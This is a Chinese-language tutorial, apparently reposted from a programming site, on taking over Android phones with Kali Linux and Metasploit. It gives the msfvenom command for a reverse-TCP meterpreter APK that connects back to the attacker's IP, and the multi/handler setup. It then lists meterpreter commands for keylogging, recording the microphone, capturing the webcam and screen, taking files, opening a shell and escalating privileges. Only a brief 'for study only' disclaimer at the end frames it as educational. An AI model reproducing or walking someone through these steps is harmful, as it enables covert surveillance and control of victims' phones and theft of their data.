KALI使用MSF攻擊安卓設備

這期是kali使用MSF進行安卓滲透的保姆級別教程，話不多說，直接開始。

準備材料：

1.裝有kali的實體機或虛擬機（這里用實體機進行演示）

2.一臺安卓10.0以下的手機

打開kali，先用ifconfig查看自己的kali IP地址：

kali查看IP?

圖中，wlan0上的192.168.2.247就是我的IP地址，記住你自己的。

然后，我們打開kali已root的終端，在上面輸入以下代碼，生成安裝包，注意端口一定是沒有用的，IP為你自己kali的IP地址：

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的kali ip lport=沒有占用的端口 R >自定義名稱.apk

?eg:

?
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.247 lport=30094 R >and.apk?

生成后效果如圖：

現在準備工作做完了，我們下一步運行msfconsole

在root終端輸入msfconsole運行，程序加載完后就會出現msf6 >（不好意思，忘了截圖了）,這時我們輸入以下代碼選擇程序：

use exploit/multi/handler

如圖：

然后我們輸入以下代碼選擇攻擊模塊：

set payload android/meterpreter/reverse_tcp

如圖：

下面設置本地ip：

set LHOST 本地ip

ip設置?

設置端口：

set lport 你選擇的端口

?敲黑板：上面的ip和端口早在建立安裝包就設置好了，不知道的去看第二步！

我們鍵入

show options

?來查看配置情況：

萬事俱備，我們輸入run來啟動程序，輸入完成后在手機上點擊剛才我們裝好的應用，注意，點開應用后不會有任何反應，但應用已經進入后臺運行，不必重復打開！

注意這一步最關鍵，主機和手機必須在同一局域網下，連接成功后如圖：連接成功如圖?

有很多人在這一步失敗了，要么沒反應，要么代碼亂竄個不停，那就是網絡或手機的問題。

現在我們輸入一個指令，讓手機打開一個應用：

app_run 應用名稱

應用名稱就是上面com.開頭的那個，不是漢語拼音！

視頻效果：

打開應用

還可以使用：

webcam_snap

?命令拍照。

還可以使用

play wav路徑

命令播放wav音頻。

視頻效果：

wav文件播放

更多命令輸入help查看。

cmd指令:

cat 讀取文件內容到屏幕

cd 更改目錄

checksum 檢索文件的校驗和

cp 將源復制到目標

del 刪除指定文件

dir 列出文件（ls 的別名）

下載下載文件或目錄

編輯編輯文件

getlwd 打印本地工作目錄

getwd 打印工作目錄

lcd 更改本地工作目錄

lls 列出本地文件

lpwd 打印本地工作目錄

ls 列出文件

mkdir 創建目錄

mv 將源移動到目標

pwd 打印工作目錄

rm 刪除指定文件

rmdir 刪除目錄

search 搜索文件

show_mount 列出所有掛載點/邏輯驅動器

upload 上傳文件或目錄

pkill 按名稱終止進程

meterpreter命令：

keyscan_start 開始捕獲擊鍵（開始鍵盤記錄）

keyscan_dump 轉儲按鍵緩沖（下載鍵盤記錄）

keyscan_stop 停止捕獲擊鍵（停止鍵盤記錄）

record_mic X秒從默認的麥克風record_mic音頻記錄（音頻錄制）

webcam_chat 開始視頻聊天（視頻，對方會有彈窗）

webcam_list 單攝像頭（查看攝像頭列表）

webcam_snap 采取快照從指定的攝像頭（攝像頭拍攝一張照片）

webcam_stream 播放視頻流從指定的攝像頭（開啟攝像頭監控）

enumdesktops 列出所有可訪問的桌面和窗口站（窗體列表）

getdesktop 得到當前的Meterpreter桌面

reboot 重新啟動遠程計算機

shutdown 關閉遠程計算機

shell 放入系統命令 shell

enumdesktops 列出所有可訪問的桌面和窗口站

getdesktop 獲取當前的meterpreter桌面

idletime 返回遠程用戶空閑的秒數

keyboard_send 發送擊鍵

keyevent 發送按鍵事件

keyscan_dump 轉儲擊鍵緩沖區

keyscan_start 開始捕獲擊鍵

keyscan_stop 停止捕獲擊鍵

mouse 發送鼠標事件

screenshare 實時觀看遠程用戶桌面

screenshot 抓取交互式桌面的屏幕截圖

setdesktop 更改 Meterpreters 當前桌面

uictl 控制一些用戶界面組件

record_mic 從默認麥克風錄制音頻 X 秒

webcam_chat 開始視頻聊天

webcam_list 列出網絡攝像頭

webcam_snap 從指定的網絡攝像頭拍攝快照

webcam_stream 播放來自指定網絡攝像頭的視頻流

play 在目標系統上播放波形音頻文件 (.wav)

getsystem 嘗試將您的權限提升到本地系統的權限

execute -f notepad 打開記事本

?溫馨提示：

遵紀守法，如出現各種法律問題與作者無關，技術沒有好壞，關鍵是看你怎么使用，本文章僅供學習與交流使用，轉載須標明出處，如有不足請大佬指出，感謝觀看！

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/web/45042.shtml
繁體地址，請注明出處：http://hk.pswp.cn/web/45042.shtml
英文地址，請注明出處：http://en.pswp.cn/web/45042.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！